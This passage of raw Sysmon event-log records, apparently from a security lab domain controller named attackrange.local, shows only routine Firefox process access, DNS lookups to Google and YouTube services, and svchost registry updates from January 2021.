a104-75-89-144.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000018885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:07.225{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:09.850{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 22542200x800000000000000018887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:08.241{59A5CD1D-8E56-6005-2E00-00000000A301}246434.164.18.104.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.678{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.769{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.gstatic.com0type: 5 gstaticadssl.l.google.com;::ffff:172.217.22.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.634{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com02a00:1450:4001:808::2008;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.632{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com0172.217.23.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.631{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:172.217.23.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.631{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com02a00:1450:4001:820::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.770{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com0172.217.22.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:11.392{59A5CD1D-8E56-6005-2E00-00000000A301}2464104.23.217.172.in-addr.arpa.0type: 12 mil04s23-in-f8.1e100.net;type: 12 mil04s23-in-f104.1e100.net;type: 12 fra16s45-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:11.392{59A5CD1D-8E56-6005-2E00-00000000A301}246474.22.217.172.in-addr.arpa.0type: 12 fra15s17-in-f74.1e100.net;type: 12 fra15s17-in-f10.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.522{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.522{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 22542200x800000000000000018903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:12.407{59A5CD1D-8E56-6005-2E00-00000000A301}246435.22.217.172.in-addr.arpa.0type: 12 fra15s16-in-f3.1e100.net;type: 12 fra15s16-in-f35.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.162{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.162{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:18.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 22542200x800000000000000018912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:20.626{59A5CD1D-8E56-6005-2E00-00000000A301}2464110.18.217.172.in-addr.arpa.0type: 12 fra16s42-in-f14.1e100.net;type: 12 zrh04s05-in-f110.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:18.631{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.18.110;::ffff:172.217.18.174;::ffff:172.217.21.206;::ffff:172.217.22.14;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.142;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.206.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;::ffff:172.217.16.174;::ffff:172.217.16.206;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:21.334{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:23.053{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:23.053{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:39.255{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:39.255{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000018921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000018920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000018919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6eda3-0x00d6261f) 13241300x800000000000000018918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000018917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000018930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 